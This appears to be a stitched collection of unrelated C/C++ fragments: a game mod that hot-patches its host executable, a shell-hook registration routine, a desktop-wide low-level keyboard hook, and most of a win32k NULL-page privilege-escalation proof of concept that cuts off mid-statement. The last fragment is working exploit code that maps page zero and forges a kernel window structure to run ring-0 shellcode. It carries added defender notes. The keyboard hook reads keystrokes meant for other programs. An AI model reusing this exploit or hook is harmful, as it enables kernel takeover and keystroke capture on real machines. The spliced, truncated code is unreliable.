// Startup routine: parses the command line into gStartupSettings, optionally
// disables the host's loader code, loads configuration, and then rewrites
// code and import slots of the running host image so that execution is
// diverted into this module's hook functions.
//
// NOTE(review): every PATCH target and raw pointer write below is an absolute
// literal address. That presumably only holds for one exact build of the host
// executable loaded at its preferred base; nothing in this function verifies
// the image before writing to it - confirm a version/hash check runs earlier.
// The statement order is significant (later patches overlap the same regions
// of the image), so do not reorder.
void TrySkipPatch() {
    //Check for arguments and write them in gStartupSettings
    ParseArgs(splitCmdArgsW(std::wstring(GetCommandLineW())));

    // If we have stdin/stdout, attach to the IPC server
    ipcServer.AttachStdinStdout();

    if (gStartupSettings.patch){
        PATCH(0x8BECF2).NOP_PAD_TO_SIZE<0x1B5>().Apply(); //nop out the loader code
        *(WORD*)(0xB25046) = -1; //set run to true
        PATCH(0x8BED00).CALL(&InitHook).Apply();
    }

    // Init freeimage:
    gFreeImgInit.init();

    // Insert callback for patching which must occur after the runtime has started
    // (0x8BEC61 is not quite as early as would be ideal for this, but it's convenient)
    PATCH(0x8BEC61).CALL(&LatePatch).Apply();

    //Load graphics from the HardcodedGraphicsManager
    HardcodedGraphicsManager::loadGraphics();

    // Either in root or in config folder. The config folder is recommended however.
    gGeneralConfig.setFilename(getLatestConfigFile(L"luna.ini"));
    gGeneralConfig.loadOrDefault();

    //game.ini reader
    // NOTE(review): runPatchByIni presumably applies memory patches described
    // by game.ini. If so, that file is effectively code for this process and
    // must only be read from a location the user trusts - confirm how
    // getLatestConfigFile resolves the path.
    GameConfiguration::runPatchByIni(INIReader(WStr2Str(getLatestConfigFile(L"game.ini"))));

    /************************************************************************/
    /* Simple ASM Source Patches                                            */
    /************************************************************************/
    fixup_TypeMismatch13();
    fixup_Credits();
    fixup_Mushbug();
    fixup_Veggibug();
    fixup_NativeFuncs();
    fixup_BGODepletion();

    /************************************************************************/
    /* Replaced Imports                                                     */
    /************************************************************************/
    IMP_vbaStrCmp = &replacement_VbaStrCmp;

    /************************************************************************/
    /* Set Hook                                                             */
    /************************************************************************/
    // Both hooks pass a NULL module and the current thread id, so they are
    // scoped to the calling thread rather than installed desktop-wide.
    // A failure is reported in a message box but start-up continues without
    // the hook.
    HookWnd = SetWindowsHookExA(WH_CALLWNDPROC, MsgHOOKProc, (HINSTANCE)NULL, GetCurrentThreadId());
    if (!HookWnd){
        DWORD errCode = GetLastError();
        std::string errCmd = "Failed to Hook";
        errCmd += "\nErr-Code: ";
        errCmd += std::to_string((long long)errCode);
        MessageBoxA(NULL, errCmd.c_str(), "Failed to Hook", NULL);
    }

    KeyHookWnd = SetWindowsHookExA(WH_KEYBOARD, KeyHOOKProc, (HINSTANCE)NULL, GetCurrentThreadId());
    if (!KeyHookWnd){
        DWORD errCode = GetLastError();
        std::string errCmd = "Failed to Hook";
        errCmd += "\nErr-Code: ";
        errCmd += std::to_string((long long)errCode);
        MessageBoxA(NULL, errCmd.c_str(), "Failed to Hook", NULL);
    }

    /************************************************************************/
    /* Source Code Function Patch                                           */
    /************************************************************************/
    // Each PATCH(addr)...Apply() chain below presumably overwrites the
    // instruction bytes at addr with the listed CALL/JMP/NOP sequence; the
    // PATCH helper itself is defined outside this function.
    PATCH(0x8D9446)
        .CALL(&OnLvlLoad)
        .NOP()
        .NOP()
        .Apply();

    PATCH(0x8CA23B)
        .CALL(&TestFunc)
        .NOP()
        .Apply();

    PATCH(0x92EC24)
        .CALL(&LevelHUDHook)
        .Apply();

    // Raw pointer-slot overwrite (not a PATCH): redirects whatever the host
    // calls through 0xB2F244 to mciSendStringHookA.
    *(void**)0xB2F244 = (void*)&mciSendStringHookA;

    PATCH(0x8D6BB6).CALL(&forceTermination).Apply();
    PATCH(0x8C11D5).CALL(&LoadWorld).Apply();
    PATCH(0x8C16F7).CALL(&WorldLoop).Apply();
    PATCH(0x8C0E6D).CALL(&LoadIntro).Apply();
    PATCH(0x932353).CALL(&printLunaLuaVersion).Apply();
    PATCH(0x9090F5).CALL(&WorldRender).Apply();

    PATCH(0x9204E5).CALL(&NPCKillHook).Apply();
    PATCH(0x9B4E35).CALL(&NPCKillHook).Apply();
    PATCH(0xA0664E).CALL(&NPCKillHook).Apply();
    PATCH(0xA23278).CALL(&NPCKillHook).Apply();

    PATCH(0xAA4352)
        .CALL(&__vbaStrCmp_TriggerSMBXEventHook)
        .NOP()
        .Apply();

    PATCH(0x8C23CB)
        .CALL(&checkLevelShutdown)
        .NOP()
        .NOP()
        .Apply();

    PATCH(0xA755D2).CALL(&UpdateInputHook_Wrapper).Apply();

    PATCH(0x902D3D).CALL(&WorldOverlayHUDBitBltHook).Apply();
    PATCH(0x902DFC).CALL(&WorldOverlayHUDBitBltHook).Apply();
    PATCH(0x902EBB).CALL(&WorldOverlayHUDBitBltHook).Apply();
    PATCH(0x902F80).CALL(&WorldOverlayHUDBitBltHook).Apply();

    PATCH(0x908995).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9087A8).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9085BB).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9083CE).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x908115).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x907F28).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x907D3B).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x907B4E).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9077FD).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x907537).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9072B2).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x90702D).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x906DB2).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9055CE).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x905304).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9051A7).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x905055).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x904F24).CALL(&WorldIconsHUDBitBltHook).Apply();
    // NOTE(review): 0x908995 was already patched at the top of this list; this
    // second entry is either redundant or a typo for another call site - confirm.
    PATCH(0x908995).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x904D4F).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9062E0).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x906183).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x906031).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x905F00).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x905D29).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x905990).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9065DE).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x906973).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x90499A).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9046D0).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x904573).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x904421).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9042F0).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x90411B).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x906B31).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x903D66).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9063FF).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x903A9C).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x90393F).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9037ED).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9036BC).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9034E7).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9032E9).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x90323D).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x90319F).CALL(&WorldIconsHUDBitBltHook).Apply();
    PATCH(0x9030F2).CALL(&WorldIconsHUDBitBltHook).Apply();

    PATCH(0x9000B2).CALL(&WorldHUDIsOnCameraHook).Apply();
    PATCH(0x900235).CALL(&WorldHUDIsOnCameraHook).Apply();
    PATCH(0x9004B7).CALL(&WorldHUDIsOnCameraHook).Apply();
    PATCH(0x90068F).CALL(&WorldHUDIsOnCameraHook).Apply();

    PATCH(0x901439).CALL(&WorldHUDPrintTextController).Apply();
    PATCH(0x90266A).CALL(&WorldHUDPrintTextController).Apply();
    PATCH(0x907611).CALL(&WorldHUDPrintTextController).Apply();
    PATCH(0x9081E7).CALL(&WorldHUDPrintTextController).Apply();
    PATCH(0x908B03).CALL(&WorldHUDPrintTextController).Apply();
    PATCH(0x908A67).CALL(&WorldHUDPrintTextController).Apply();

    PATCH(0x909217).CALL(&GenerateScreenshotHook).Apply();
    PATCH(0x94D5E7).CALL(&GenerateScreenshotHook).Apply();

    PATCH(0x8C03DC).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x8C0A1A).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x8C1383).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x8C1953).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x8CE292).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x8E61BD).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x8FE8D4).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x987E94).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0x9B7B2C).CALL(&InitLevelEnvironmentHook).Apply();
    PATCH(0xA02AD3).CALL(&InitLevelEnvironmentHook).Apply();

    // Graphics Bitblt hooks
    PATCH(0x8C137E).CALL(&LoadLocalGfxHook).Apply();
    PATCH(0x8D8BF1).CALL(&LoadLocalGfxHook).Apply();
    PATCH(0x8D9611).CALL(&LoadLocalGfxHook).Apply();
    PATCH(0x8DF52B).CALL(&LoadLocalGfxHook).Apply();
    PATCH(0x8DFF7C).CALL(&LoadLocalGfxHook).Apply();
    PATCH(0x8DEF73).CALL(&LoadLocalOverworldGfxHook).Apply();
    PATCH(0x8DF808).CALL(&LoadLocalOverworldGfxHook).Apply();

    //PATCH(0x4242D0).JMP(GET_RETADDR_TRACE_HOOK<&BitBltTraceHook>()).Apply();
    PATCH(0x4242D0).JMP(&BitBltHook).Apply();
    PATCH(0x424314).JMP(&StretchBltHook).Apply();

    PATCH(0x8E54EC)
        .CALL(&MessageBoxOpenHook)
        .NOP()
        .Apply();

    // Okay redigit, I know your debug values are in general pretty dumb, but right now they are awesome for easy patching! Thx mate!
    PATCH(0x90C856)
        .CALL(&CameraUpdateHook_Wrapper)
        .NOP()
        .NOP()
        .Apply();

    // Hook to fix 100% CPU when window is inactive
    PATCH(0x8E6FE1)
        .NOP()
        .CALL(&WindowInactiveHook)
        .Apply();

    // PATCH(0x96CC61).TRACE_CALL<&HardcodedGraphicsBitBltHook>().Apply();

    // Don't trust QPC as much on WinXP
    // (the QPC variants are selected only when gIsWindowsVistaOrNewer is set)
    void* frameTimingHookPtr;
    void* frameTimingMaxFPSHookPtr;
    if (gIsWindowsVistaOrNewer) {
        frameTimingHookPtr = (void*)&FrameTimingHookQPC;
        frameTimingMaxFPSHookPtr = (void*)&FrameTimingMaxFPSHookQPC;
    }
    else
    {
        frameTimingHookPtr = (void*)&FrameTimingHook;
        frameTimingMaxFPSHookPtr = (void*)&FrameTimingMaxFPSHook;
    }

    // Hooks to fix 100% CPU during operation
    // These ones are normally not sensitive to the "max FPS" setting
    PATCH(0x8BFD4A).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply();
    PATCH(0x8C0488).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply();
    PATCH(0x8C0EE6).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply();
    // These ones are normally sensitive to the "max FPS" setting
    PATCH(0x8C15A7).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
    PATCH(0x8C20FC).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
    PATCH(0x8E2AED).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
    PATCH(0x8E56ED).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();

    // Logging for NPC collisions
    //PATCH(0xA281B0).JMP(GET_RETADDR_TRACE_HOOK<&collideNPCLoggingHook>()).NOP().Apply();

    // Level and world render hooks
    PATCH(0x909290).JMP(RenderLevelHook).NOP().Apply();
    PATCH(0x8FEB10).JMP(RenderWorldHook).NOP().Apply();

    // Level rendering layering hooks
    //PATCH(0x90C856).NOP().NOP().CALL(GetRenderBelowPriorityHook<-95>()).Apply(); //-100: Level Background
    PATCH(0x90F4FA).NOP().NOP().CALL(GetRenderBelowPriorityHook<-95>()).Apply(); // -95: Furthest back BGOs
    PATCH(0x910433).NOP().NOP().CALL(GetRenderBelowPriorityHook<-90>()).Apply(); // -90: Sizable Blocks
    PATCH(0x910E5D).NOP().NOP().CALL(GetRenderBelowPriorityHook<-85>()).Apply(); // -85: Some more BGOs
    PATCH(0x911F19).NOP().NOP().CALL(GetRenderBelowPriorityHook<-80>()).Apply(); // -80: Warp - Derived BGOs (locks on doors and stuff)
    PATCH(0x912748).NOP().NOP().CALL(GetRenderBelowPriorityHook<-75>()).Apply(); // -75: Background NPCs (vines, piranha plants, diggable sand, mother brain, things in MB jars)
    PATCH(0x915316).NOP().NOP().CALL(GetRenderBelowPriorityHook<-70>()).Apply(); // -70: Held NPCs
    PATCH(0x91D422).NOP().NOP().CALL(GetRenderBelowPriorityHook<-65>()).Apply(); // -65: Normal Blocks
    PATCH(0x91DD44).NOP().NOP().CALL(GetRenderBelowPriorityHook<-60>()).Apply(); // -60: Furthest Back Effects (doors, pressed p-switches, some other stuff)
    PATCH(0x91E1F2).NOP().NOP().CALL(GetRenderBelowPriorityHook<-55>()).Apply(); // -55: Some NPCs (i.e. coins, clown car, chompy, herb, wood rocket, koopaling fire)
    PATCH(0x91F802).NOP().NOP().CALL(GetRenderBelowPriorityHook<-50>()).Apply(); // -50: Some NPCs (ice blocks)
    PATCH(0x920040).NOP().NOP().CALL(GetRenderBelowPriorityHook<-45>()).Apply(); // -45: Normal NPCs
    PATCH(0x922D00).NOP().NOP().CALL(GetRenderBelowPriorityHook<-40>()).Apply(); // -40: Symbol above NPCs that want to chat (hardcoded-43/44)
    PATCH(0x923786).NOP().NOP().CALL(GetRenderBelowPriorityHook<-35>()).Apply(); // -35: Player Mounts
    PATCH(0x927F21).NOP().NOP().CALL(GetRenderBelowPriorityHook<-30>()).Apply(); // -30: Something else player mount related?
    PATCH(0x928EA5).NOP().NOP().CALL(GetRenderBelowPriorityHook<-25>()).Apply(); // -25: Players
    PATCH(0x928F0A).NOP().NOP().CALL(GetRenderBelowPriorityHook<-20>()).Apply(); // -20: Foreground BGOs
    PATCH(0x929F81).NOP().NOP().CALL(GetRenderBelowPriorityHook<-15>()).Apply(); // -15: Foreground NPCs
    PATCH(0x92B428).NOP().NOP().CALL(GetRenderBelowPriorityHook<-10>()).Apply(); // -10: Foreground Blocks
    PATCH(0x92BAC0).NOP().NOP().CALL(GetRenderBelowPriorityHook<-5>()).Apply(); // -5: Foreground Effects (all not at 0091DD90)
    // Handle Priority 5 from LevelHUDHook // 5: HUD
    PATCH(0x939977).NOP().NOP().CALL(GetRenderBelowPriorityHook<100>()).Apply();

    // Change Mode Hook
    // Runs when the game starts or the game mode changes.
    PATCH(0x8BF4E3).CALL(runtimeHookSmbxChangeModeHookRaw).NOP_PAD_TO_SIZE<10>().Apply();

    // Load level hook
    PATCH(0x8D8F40).JMP(runtimeHookLoadLevel).NOP_PAD_TO_SIZE<6>().Apply();

    // Close window hook
    PATCH(0x8BE3DA).CALL(runtimeHookCloseWindow).Apply();

    // Anti-Fullscreen hook
    PATCH(0x95429A).CALL(runtimeHookChangeResolution).Apply();
    PATCH(0xA98142).CALL(runtimeHookChangeResolution).Apply();
    PATCH(0xA98166).CALL(runtimeHookChangeResolution).Apply();
    PATCH(0x96ADD7).CALL(runtimeHookSmbxCheckWindowedRaw).NOP_PAD_TO_SIZE<8>().Apply();

    PATCH(0x9DB1D8).JMP(runtimeHookBlockBumpableRaw).NOP_PAD_TO_SIZE<6>().Apply();

    PATCH(0xA28FE3).JMP(runtimeHookNPCVulnerabilityRaw).Apply();

    PATCH(0x9A9D33).JMP(runtimeHookNPCSpinjumpSafeRaw).NOP_PAD_TO_SIZE<10>().Apply();

    PATCH(0xA75079).JMP(runtimeHookCheckInputRaw).NOP_PAD_TO_SIZE<7>().Apply();

    /************************************************************************/
    /* Import Table Patch                                                   */
    /************************************************************************/
    // NOTE(review): the two saves below are not symmetrical. __vbaR4Var is set
    // to the slot address 0x00401124 itself, while rtcMsgBox is set to the
    // pointer read out of slot 0x004010A8. If __vbaR4Var is meant to hold the
    // original function, it would need the dereferenced value - confirm
    // against how vbaR4VarHook uses it.
    __vbaR4Var = (float(*)(VARIANTARG*))0x00401124;
    *(void**)0x00401124 = (void*)&vbaR4VarHook;

    rtcMsgBox = (int(__stdcall *)(VARIANTARG*, DWORD, DWORD, DWORD, DWORD))(*(void**)0x004010A8);
    *(void**)0x004010A8 = (void*)&rtcMsgBoxHook;
}
/*************************************************************************
 *				RegisterShellHook	[SHELL.102]
 *
 * Only action code 2 (register hWnd as a shell window) is handled.
 * The WH_SHELL hook is installed once, on first use, with thread id 0 and
 * the shell32.dll module handle, i.e. as a global hook rather than one
 * limited to the calling thread.
 *
 * Returns nonzero when hWnd was stored as the shell window. Returns FALSE
 * when the hook could not be installed, when HWND_32(hWnd) is 0, or for any
 * other action code (which also resets SHELL_hWnd).
 */
BOOL WINAPI RegisterShellHook16(HWND16 hWnd, UINT16 uAction)
{
    TRACE("%04x [%u]\n", hWnd, uAction );

    if (uAction != 2)
    {
        WARN("-- unknown code %i\n", uAction );
        SHELL_hWnd = 0; /* just in case */
        return FALSE;
    }

    /* register hWnd as a shell window */
    if (!SHELL_hHook)
    {
        SHELL_hHook = SetWindowsHookExA( WH_SHELL, SHELL_HookProc,
                                         GetModuleHandleA("shell32.dll"), 0 );
        if (!SHELL_hHook)
        {
            WARN("-- unable to install ShellHookProc()!\n");
            return FALSE;
        }

        /* first successful install: register the notification messages */
        uMsgWndCreated = RegisterWindowMessageA( lpstrMsgWndCreated );
        uMsgWndDestroyed = RegisterWindowMessageA( lpstrMsgWndDestroyed );
        uMsgShellActivate = RegisterWindowMessageA( lpstrMsgShellActivate );
    }

    SHELL_hWnd = HWND_32(hWnd);
    return (SHELL_hWnd != 0);
}
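/// @brief Starts a detached worker thread that installs the low-level
///        keyboard hook and then pumps messages for it.
///
/// The outcome is reported asynchronously through g_keyboardHookedCallback
/// (when set): `false` if a hook is already installed or installation failed,
/// `true` once SetWindowsHookExA succeeded.
///
/// A WH_KEYBOARD_LL hook receives keyboard events for the whole desktop
/// session, not just this process, so lowLevelKeyboardProc sees input meant
/// for other applications as well.
///
/// NOTE(review): g_hook is read and written here without synchronization, so
/// two overlapping calls can both pass the "already installed" check - confirm
/// callers serialize this.
///
/// @return Always true; it only signals that the worker thread was started.
bool initializeKeyhook()
{
    std::thread([=]() {
        if (g_hook != nullptr) {
            // A hook already exists: report this attempt as not installed.
            if (g_keyboardHookedCallback) g_keyboardHookedCallback(false);
            return;
        }

        g_hook = SetWindowsHookExA(WH_KEYBOARD_LL, lowLevelKeyboardProc, GetModuleHandle(0), 0);
        if (g_keyboardHookedCallback) g_keyboardHookedCallback(g_hook != nullptr);

        // Without a hook there is nothing to pump messages for; leaving the
        // thread parked in GetMessageA forever would only leak it.
        if (g_hook == nullptr) return;

        // The installing thread must run a message loop for the low-level
        // hook to be called. GetMessageA returns -1 on error, which a plain
        // truth test would treat as "keep going" with an unfilled MSG, so
        // only continue on a strictly positive result.
        MSG msg;
        while (GetMessageA(&msg, NULL, 0, 0) > 0) {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
    }).detach();

    return true;
}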
/*
 * Local privilege-escalation proof of concept against win32k (per the
 * function name and the win32k!tagWND comments below). In order, it:
 *   1. gates on the Windows version and picks OffsetWindows for it,
 *   2. resolves ntdll exports and lists loaded kernel modules to compute
 *      the kernel address of PsLookupProcessByProcessId,
 *   3. registers a window class and creates a window,
 *   4. allocates the NULL page and writes a fake structure into it,
 *   5. builds two popup menus, installs a thread-local WH_CALLWNDPROC hook
 *      and calls TrackPopupMenu,
 *   6. starts ExecutePayload(lpPayload) on a new thread.
 *
 * Defender notes:
 *   - Step 4 requires user mode to be able to map page zero. Windows 8 and
 *     later block that by default, and the version gate here accepts only
 *     5.1, 5.2, 6.0 and 6.1 (6.1 only on x64 builds).
 *   - Observable behaviour: NtAllocateVirtualMemory with a base address of 1
 *     (or 0xfffffffb on x64) and PAGE_EXECUTE_READWRITE, a kernel-module
 *     listing via ZwQuerySystemInformation class 11, and a user process
 *     calling LoadLibraryA on the kernel image name.
 *
 * lpPayload is passed through untouched to ExecutePayload.
 */
void Win32kNullPage(LPVOID lpPayload) {
    HWND hWnd;
    WNDCLASSA WndClass;
    LPBYTE promise_land = NULL;
    HMODULE hNtdll = NULL;
    HMODULE ntkrnl = NULL;
    NTSTATUS status;
    PULONG pSystemInfoBuffer = NULL;
    lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
    ULONG SystemInfoBufferSize = 0;
    char nt_name[256];
    PVOID nt_base;
    OSVERSIONINFOA VersionInformation;

    // Getting Windows version
    LogMessage("[*] Getting Windows version...");
    memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
    VersionInformation.dwOSVersionInfoSize = 148;
    if (!GetVersionExA(&VersionInformation)) {
        LogMessage("[!] Failed to get windows version");
        return;
    }

    /* Version gate: any version not listed falls through to the final
     * else and the function returns without doing anything further. */
#ifdef _M_X64
    if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) {
        // Ex: Windows 7 SP1
        LogMessage("[*] Windows 6.1 found...");
        OffsetWindows = 0x208;
    }
#else
    if (VersionInformation.dwMajorVersion == 6) {
        if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) {
            // Ex: Windows 7 SP1
            LogMessage("[*] Windows 6.1 found...");
            OffsetWindows = 0xf8;
        }
        else if (!VersionInformation.dwMinorVersion) {
            LogMessage("[*] Windows 6.0 found...");
            // Ex: Windows 2008 R2
            OffsetWindows = 0xe0;
        }
        else {
            LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
            return;
        }
    }
    else if (VersionInformation.dwMajorVersion == 5) {
        if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) {
            // Ex: Windows XP SP3
            LogMessage("[*] Windows 5.1 found...");
            OffsetWindows = 0xc8;
        }
        else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) {
            // Ex: Windows 2003 SP2
            LogMessage("[*] Windows 5.2 found...");
            OffsetWindows = 0xd8;
        }
        else {
            LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
            return;
        }
    }
#endif
    else {
        LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
        return;
    }

    // Solve symbols
    LogMessage("[*] Solving symbols...");

    hNtdll = LoadLibraryA("ntdll");
    if (hNtdll == NULL) {
        LogMessage("[!] Failed to Load ntdll...");
        return;
    }

    pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
    if (pZwQuerySystemInformation == NULL) {
        LogMessage("[!] Failed to solve ZwQuerySystemInformation");
        return;
    }

    pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    if (pNtAllocateVirtualMemory == NULL) {
        LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
        return;
    }

    /* Information class 11 is queried twice: first to learn the required
     * buffer size, then to fetch the kernel module list itself. */
    LogMessage("[*] Requesting Kernel loaded modules...");
    status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
    if (SystemInfoBufferSize == 0) {
        LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
        return;
    }
    else {
        LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
    }

    pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
    if (pSystemInfoBuffer == NULL) {
        LogMessage("[!] Allocation for SystemInfo failed");
        return;
    }

    status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
    if (status != STATUS_SUCCESS) {
        LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
        return;
    }

    LogMessage("[*] Parsing SYSTEM_INFO...");

    SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
    LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);

    memset(nt_name, 0, 256);
    int i = 0;
    /* Take the first module whose name contains ".exe" and "nt"; its base
     * address and the name from "nt" onwards are kept. */
    while (i < smi->ModulesCount) {
        SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
        LogMessage("[*] Checking module %s", sm->Name);
        if (strstr((char *)sm->Name, ".exe")) {
            char *start = strstr((char *)sm->Name, "nt");
            if (start != NULL) {
                nt_base = sm->ImageBaseAddress;
                strncpy_s(nt_name, 256, start, _TRUNCATE);
                break;
            }
        }
        i++;
    }

    if (nt_name == NULL) {
        LogMessage("[!] nt not found");
        return;
    }
    else {
        LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
    }

    /* The kernel image is loaded into this process only to read an export
     * offset, which is then rebased onto the kernel base address. */
    ntkrnl = LoadLibraryA(nt_name);
    LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);

    pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
    if (pPsLookupProcessByProcessId == NULL) {
        LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
        return;
    }

#ifdef _M_X64
    pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
    LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
#else
    pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
    LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
#endif

    MyProcessId = GetCurrentProcessId();

    // Register Class
    LogMessage("[*] Registering class...");
    memset(&WndClass, 0, sizeof(WNDCLASSA));
    WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
    WndClass.lpszClassName = "woqunimalegebi";

    if (RegisterClassA(&WndClass) == 0) {
        LogMessage("[!] RegisterClassA failed ");
        return;
    }

    // Create Window
    LogMessage("[*] Creating window...");
    hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
    if (hWnd == NULL) {
        LogMessage("[!] CreateWindowExA failed");
        return;
    }

    // Making everything ready for exploitation...
    /* This allocation is the step that NULL-page mapping protection stops:
     * with that protection active the call fails and the function returns
     * here. */
    LogMessage("[*] Allocating null page...");
#ifdef _M_X64
    ULONGLONG base_address = 0x00000000fffffffb;
#else
    DWORD base_address = 1;
#endif
    SIZE_T region_size = 0x1000;
    ULONG zero_bits = 0;
    HANDLE current_process = NULL;

    current_process = GetCurrentProcess();
    if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
        LogMessage("[!] Failed to allocate null page");
        return;
    }

    LogMessage("[*] Getting PtiCurrent...");
#ifdef _M_X64
    ULONGLONG pti = MyPtiCurrent();
#else
    DWORD pti = MyPtiCurrent();
#endif
    /* Retried once after loading user32/gdi32. */
    if (pti == 0) {
        LoadLibrary("user32.dll");
        LoadLibrary("gdi32.dll");
        pti = MyPtiCurrent();
    }

    if (pti == 0) {
        LogMessage("[!] Filed to get PtiCurrent");
        return;
    }
    else {
#ifdef _M_X64
        LogMessage("[*] Good! pti 0x%016llx", pti);
#else
        LogMessage("[*] Good! pti 0x%08x", pti);
#endif
    }

    LogMessage("[*] Creating a fake structure at NULL...");

#ifdef _M_X64
    void *test = NULL;
    (QWORD)test = 0x10000000B;
    *((PQWORD)test) = pti;
    /* win32k!tagWND->bServerSideWindowProc = TRUE */
    (QWORD)test = 0x100000025;
    *((PBYTE)test) = 4;
    /* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
    (QWORD)test = 0x10000008B;
